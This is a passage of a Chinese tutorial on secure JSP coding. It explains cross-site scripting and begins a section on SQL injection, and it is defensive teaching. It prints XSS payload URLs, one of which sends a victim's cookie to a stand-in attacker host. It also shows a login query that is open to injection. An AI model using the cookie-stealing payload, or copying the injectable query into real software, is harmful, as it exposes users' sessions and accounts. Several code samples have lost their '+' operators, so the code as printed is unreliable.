JSP安全编程实例浅析

 

　　这与PHP中全局变量导致的安全问题如出一辙。由此可见：“property="*"”一定要慎用！
　　三、长盛不衰的跨站脚本

　　跨站脚本（Cross Site Scripting）攻击是指在远程WEB页面的HTML代码中手插入恶意的JavaScript, VBScript, ActiveX, HTML, 或Flash等脚本，窃取浏览此页面的用户的隐私，改变用户的设置，破坏用户的数据。跨站脚本攻击在多数情况下不会对服务器和WEB程序的运行造成影响，但对客户端的安全构成严重的威胁。

　　以仿动网的阿菜论坛（beta-1）举个最简单的例子。当我们提交

http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser＜;script＞alert(document.cookie)＜/script＞

　　便能弹出包含自己cookie信息的对话框。而提交

http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser＜;script＞document.location='http://www.163.com'＜/script＞

　　就能重定向到网易。

　　由于在返回“name”变量的值给客户端时，脚本没有进行任何编码或过滤恶意代码，当用户访问嵌入恶意“name”变量数据链接时，会导致脚本代码在用户浏览器上执行，可能导致用户隐私泄露等后果。比如下面的链接：

http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser＜;script＞document.location='http://www.hackersite.com/xxx.xxx?' document.cookie＜/script＞

　　xxx.xxx用于收集后边跟的参数，而这里参数指定的是document.cookie，也就是访问此链接的用户的cookie。在ASP世界中，很多人已经把偷cookie的技术练得炉火纯青了。在JSP里，读取cookie也不是难事。当然，跨站脚本从来就不会局限于偷cookie这一项功能，相信大家都有一定了解，这里就不展开了。

　　对所有动态页面的输入和输出都应进行编码，可以在很大程度上避免跨站脚本的攻击。遗憾的是，对所有不可信数据编码是资源密集型的工作，会对 Web 服务器产生性能方面的影响。常用的手段还是进行输入数据的过滤，比如下面的代码就把危险的字符进行替换：

＜% String message = request.getParameter("message");
message = message.replace ('＜','_');
message = message.replace ('＞','_');
message = message.replace ('"','_');
message = message.replace ('\'','_');
message = message.replace ('%','_');
message = message.replace (';','_');
message = message.replace ('(','_');
message = message.replace (')','_');
message = message.replace ('&','_');
message = message.replace (' ','_'); %＞

　　更积极的方式是利用正则表达式只答应输入指定的字符：

public boolean isValidInput(String str)
{
　if(str.matches("[a-z0-9] ")) return true;
　else return false;
}

　　四、时刻牢记SQL注入

　　一般的编程书籍在教初学者的时候都不注重让他们从入门时就培养安全编程的习惯。闻名的《JSP编程思想与实践》就是这样向初学者示范编写带数据库的登录系统的（数据库为MySQL）：

Statement stmt = conn.createStatement();
String checkUser = "select * from login where username = '" userName "' and userpassword = '" userPassword "'";
ResultSet rs = stmt.executeQuery(checkUser);
if(rs.next())
　response.sendRedirect("SuccessLogin.jsp");
else
　response.sendRedirect("FailureLogin.jsp");

　　这样使得尽信书的人长期使用这样先天“带洞”的登录代码。假如数据库里存在一个名叫“jack”的用户，那么在不知道密码的情况下至少有下面几种方法可以登录：
共4页: 上一页 [1] 2 [3] [4] 下一页

评论加载中…